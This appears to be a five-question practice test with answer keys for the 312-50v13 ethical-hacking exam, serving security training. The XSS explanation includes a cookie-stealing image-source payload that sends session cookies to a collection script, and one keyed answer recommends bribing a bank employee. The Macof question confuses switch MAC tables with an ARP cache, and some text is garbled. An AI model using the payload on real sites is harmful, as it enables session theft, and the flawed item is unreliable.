312-50v13 Free Practice Test

- (Topic 2)
Nathan is testing some of his network devices. Nathan is using Macof to try and flood the ARP cache of these switches.
If these switches' ARP cache is successfully flooded, what will be the result?

1. A. The switches will drop into hub mode if the ARP cache is successfully flooded.
2. B. If the ARP cache is flooded, the switches will drop into pix mode making it less susceptible to attacks.
3. C. Depending on the switch manufacturer, the device will either delete every entry in its ARP cache or reroute packets to the nearest switch.
4. D. The switches will route all traffic to the broadcast address created collisions.

Correct Answer: A

- (Topic 2)
You are trying to break into a highly classified top-secret mainframe computer with highest security system in place at Merclyn Barley Bank located in Los Angeles.
You know that conventional hacking doesn't work in this case, because organizations such as banks are generally tight and secure when it comes to protecting their systems.
In other words, you are trying to penetrate an otherwise impenetrable system. How would you proceed?

1. A. Look for "zero-day" exploits at various underground hacker websites in Russia and China and buy the necessary exploits from these hackers and target the bank's network
2. B. Try to hang around the local pubs or restaurants near the bank, get talking to a poorly- paid or disgruntled employee, and offer them money if they'll abuse their access privileges by providing you with sensitive information
3. C. Launch DDOS attacks against Merclyn Barley Bank's routers and firewall systems using 100, 000 or more "zombies" and "bots"
4. D. Try to conduct Man-in-the-Middle (MiTM) attack and divert the network traffic going to the Merclyn Barley Bank's Webserver to that of your machine using DNS Cache Poisoning techniques

Correct Answer: B

- (Topic 1)
Steve, a scientist who works in a governmental security agency, developed a technological solution to identify people based on walking patterns and implemented this approach to a physical control access.
A camera captures people walking and identifies the individuals using Steve??s approach. After that, people must approximate their RFID badges. Both the identifications are
required to open the door. In this case, we can say:

1. A. Although the approach has two phases, it actually implements just one authentication factor
2. B. The solution implements the two authentication factors: physical object and physical characteristic
3. C. The solution will have a high level of false positives
4. D. Biological motion cannot be used to identify people

Correct Answer: B

- (Topic 2)
What piece of hardware on a computer's motherboard generates encryption keys and only releases a part of the key so that decrypting a disk on a new piece of hardware is not possible?

1. A. CPU
2. B. GPU
3. C. UEFI
4. D. TPM

Correct Answer: D
The TPM is a chip that'spart of youcr omputer's motherboard — if you bought an off-the-shelf PC, it's soldered onto the motherboard. If you built your own computer, you can buy one as an add-on module if your motherboard supports it. The TPM generates encryption keys, keeping part of the key to itself

- (Topic 3)
Judy created a forum, one day. she discovers that a user is posting strange images without writing comments.
She immediately calls a security expert, who discovers that the following code is hidden behind those images:
[removed]
[removed]f); [removed]
What issue occurred for the users who clicked on the image?

1. A. The code inject a new cookie to the browser.
2. B. The code redirects the user to another site.
3. C. The code is a virus that is attempting to gather the users username and password.
4. D. This php file silently executes the code and grabs the users session cookie and session ID.

Correct Answer: D
[removed](<img.src=https://localhost/submitcookie.php cookie =+ escape([removed]) +/>); (Cookie and session ID theft)
https://www.softwaretestinghelp.com/cross-site-scripting-xss-attack-test/
As seen in the indicated question, cookies are escaped and sent to script to variable ??cookie??. If the malicious user would inject this script into the website??s code, then it will be executed in the user??s browser and cookies will be sent to the malicious user.